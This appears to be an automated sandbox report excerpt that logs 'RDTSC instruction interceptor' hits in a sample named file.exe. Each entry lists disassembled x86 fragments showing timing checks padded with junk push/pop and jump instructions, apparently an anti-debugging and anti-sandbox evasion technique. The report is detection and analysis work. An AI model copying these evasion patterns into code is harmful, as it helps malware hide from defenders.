                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A95 second address: 10B6AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC8B10h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6AB3 second address: 10B6ABD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066517 second address: 106651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106651B second address: 1066570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, di 0x0000000d mov ebx, dword ptr [ebp+1247A496h] 0x00000013 mov dx, si 0x00000016 mov edi, dword ptr [ebp+122D3866h] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FC408FC7018h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 and ecx, 3479486Ah 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 jnp 00007FC408FC7016h 0x0000004a popad 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066570 second address: 1066589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC408FC8B14h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066589 second address: 10665AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC408FC7024h 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FC408FC7016h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10665AE second address: 10665F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC408FC8B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add ecx, dword ptr [ebp+122D2E42h] 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FC408FC8B08h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e nop 0x0000002f jmp 00007FC408FC8B0Ch 0x00000034 push eax 0x00000035 push ecx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6D16 second address: 10B6D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC408FC7016h 0x0000000a popad 0x0000000b jmp 00007FC408FC701Ch 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7978 second address: 10B7980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7980 second address: 10B798B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC408FC7016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B798B second address: 10B79A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FC408FC8B06h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FC408FC8B06h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB50D second address: 10BB513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB513 second address: 10BB518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDBD9 second address: 10BDBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jne 00007FC408FC7016h 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDBF0 second address: 10BDBF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD43 second address: 10BDD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC408FC7016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD4F second address: 10BDD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FC408FC8B25h 0x0000000e jmp 00007FC408FC8B0Eh 0x00000013 jmp 00007FC408FC8B11h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC408FC8B14h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD92 second address: 10BDDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC408FC7026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDAE second address: 10BDDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDB4 second address: 10BDDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDF18 second address: 10BDF43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC408FC8B0Bh 0x00000010 jnp 00007FC408FC8B06h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE20D second address: 10BE21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007FC408FC7016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C23A2 second address: 10C23A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C23A6 second address: 10C23B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC408FC7016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C18FC second address: 10C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B0Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C190C second address: 10C1925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1925 second address: 10C1937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C71 second address: 10C1C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C77 second address: 10C1C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FC408FC8B0Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C8D second address: 10C1C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1C97 second address: 10C1C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1DF2 second address: 10C1DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC408FC7016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1DFD second address: 10C1E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C88EB second address: 10C890D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7027h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8A82 second address: 10C8A8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8A8C second address: 10C8A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DAE second address: 10C8DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DB2 second address: 10C8DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC408FC7016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC408FC7024h 0x00000015 jmp 00007FC408FC701Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8DD9 second address: 10C8DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B18h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9377 second address: 10C9382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EB8 second address: 10C9EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EBE second address: 10C9EC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9EC8 second address: 10C9ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1D5 second address: 10CA1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1D9 second address: 10CA1F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B12h 0x00000007 jg 00007FC408FC8B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1F9 second address: 10CA1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA1FF second address: 10CA21E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC408FC8B16h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA21E second address: 10CA223 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA223 second address: 10CA229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA229 second address: 10CA247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC408FC7025h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA247 second address: 10CA24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA580 second address: 10CA584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA584 second address: 10CA58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA58D second address: 10CA593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA593 second address: 10CA5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5A6 second address: 10CA5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC408FC701Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007FC408FC7016h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5BF second address: 10CA609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B17h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC408FC8B0Eh 0x00000012 jmp 00007FC408FC8B11h 0x00000017 jl 00007FC408FC8B08h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA609 second address: 10CA60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF145 second address: 10CF149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF149 second address: 10CF179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC408FC701Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC701Bh 0x00000013 jmp 00007FC408FC7021h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF179 second address: 10CF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D221F second address: 10D2223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2223 second address: 10D2242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B14h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2242 second address: 10D2248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2248 second address: 10D224E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D26DA second address: 10D26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D26E0 second address: 10D26FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC408FC8B1Ah 0x0000000b jmp 00007FC408FC8B12h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D29E8 second address: 10D29EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2B71 second address: 10D2B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC8B18h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2E65 second address: 10D2E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAD3F second address: 10DAD4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC408FC8B06h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAD4F second address: 10DAD62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC408FC701Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D959D second address: 10D95A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D95A3 second address: 10D95AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC408FC7016h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9B80 second address: 10D9B91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jng 00007FC408FC8B1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D9CE5 second address: 10D9CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC408FC7016h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DABE7 second address: 10DABEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1029DA1 second address: 1029DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jno 00007FC408FC7016h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1029DB8 second address: 1029DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1E5B second address: 10E1E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4AF9 second address: 10F4B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC408FC8B06h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4B04 second address: 10F4B3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 jmp 00007FC408FC7025h 0x0000000e jmp 00007FC408FC7028h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F4B3C second address: 10F4B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F46CA second address: 10F46CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F46CE second address: 10F46D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F482A second address: 10F4832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDF33 second address: 10FDF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FDF39 second address: 10FDF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F3A second address: 1103F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC408FC8B19h 0x00000011 jmp 00007FC408FC8B0Dh 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F6D second address: 1103F98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7025h 0x00000007 jc 00007FC408FC701Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103F98 second address: 1103FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103FA1 second address: 1103FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC408FC7025h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103FBA second address: 1103FC9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC408FC8B06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110CCAB second address: 110CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
